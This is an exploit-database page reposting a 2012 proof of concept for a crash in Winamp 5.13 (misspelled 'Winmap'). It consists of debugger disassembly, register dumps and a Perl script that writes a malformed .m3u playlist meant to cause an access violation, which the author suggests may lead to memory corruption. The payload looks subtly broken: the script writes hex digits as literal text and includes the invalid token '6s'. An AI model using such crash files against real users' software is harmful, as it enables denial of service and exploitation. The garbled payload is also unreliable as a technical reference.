首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Winmap 5.13 Full- Exception Handling Vulnerablity
来源:fb.me/dark.puzzle 作者:Dark-Puzzle 发布时间:2012-06-26   
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   Dark-Puzzle From Inj3ct0r TEAM                       1
 1               ==========================================               0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Exploit Title: Winmap 5.13 Full- Exception Handling Vulnerablity .
# Author: Dark-Puzzle
# Category : Local Exploit
# Software Link : http://www.oldapps.com/winamp.php?old_winamp=214?download
# Date: 25 June 2012
# Version: 5.13 Full Version , previous versions may be vulnerable .
# Tested on: Windows Xp Sp2 .

----------------------------------------------------------
Understanding the exploit :

*Executing file.m3u in Winamp 5.13 Full .

*After debugging the program , I discovered that this was an Exception Handling error
by Access Violation . registred in [EAX] Memory . Not By Division by zero here.

diasembly
                              
7C928FCE  |.  57            PUSH EDI
7C928FCF  |.  1BC0          SBB EAX,EAX
7C928FD1  |.  F7D0          NOT EAX
7C928FD3  |.  25 40C1987C   AND EAX,7C98C140
7C928FD8  |.  8BF8          MOV EDI,EAX
7C928FDA  |.  8B46 10       MOV EAX,DWORD PTR DS:[ESI+10]
7C928FDD  |.  3BC3          CMP EAX,EBX
7C928FDF  |.  8945 FC       MOV DWORD PTR SS:[LOCAL.1],EAX
7C928FE2  |.  0F84 9E000000 JE 7C929086
7C928FE8  |>  8B06          MOV EAX,DWORD PTR DS:[ESI]
7C928FEA  |.  FF40 10       INC DWORD PTR DS:[EAX+10] <<---- Access Violation

Registers :

-------------
EAX 35206534
-------------
ECX 00000000
EDX 00487D00 
EBX 00000000
ESP 00D7FE00
EBP 00D7FE74
ESI 00487D00 
EDI 00000000
-------------
EIP 7C928FEA ntdll.7C928FEA
-------------



Error : Access Violation when writing to [35206544] - Application was unable to process exception .
Access Violation. Unhandle exception in winmap.exe 

The Thing here is that EAX registered 35206534 ,
but the access violation was in [35206544] . Because , as we see here "INC DWORD PTR DS:[EAX+10]."

We can fill some nops in our exploitation code , but I prefer not .

-------------------------------------------------------------------

PoC : 
#!/usr/bin/perl
my $file = "dark.m3u";
my $cr = "4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f";
open ($File, ">$file");
print $File $cr;
close ($File);

-----------------------------------------------------------------
A memorry corruption vulnerability maybe possible . 
-----------------------------------------------------------------

Dark-Puzzle (Souhail) .
Follow me : fb.me/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members ....

GREY HAT Mercy .
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Able2Doc and Able2Doc Professi
·Western Digital TV (WD-TV) Liv
·Able2Extract and Able2Extract
·Root Exploit Western Digital's
·Slimpdf Reader 1.0 Memory Corr
·VLC 2.0.1 - .avi playlist plug
·Kingview Touchview 6.53 Multip
·Linux 3.x.x Executable File Re
·Kingview Touchview 6.53 EIP Ov
·Real Player 10 GOLD - Exceptio
·Apple iTunes 10 Extended M3U S
·Symantec PcAnywhere 12.5.0 Log
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved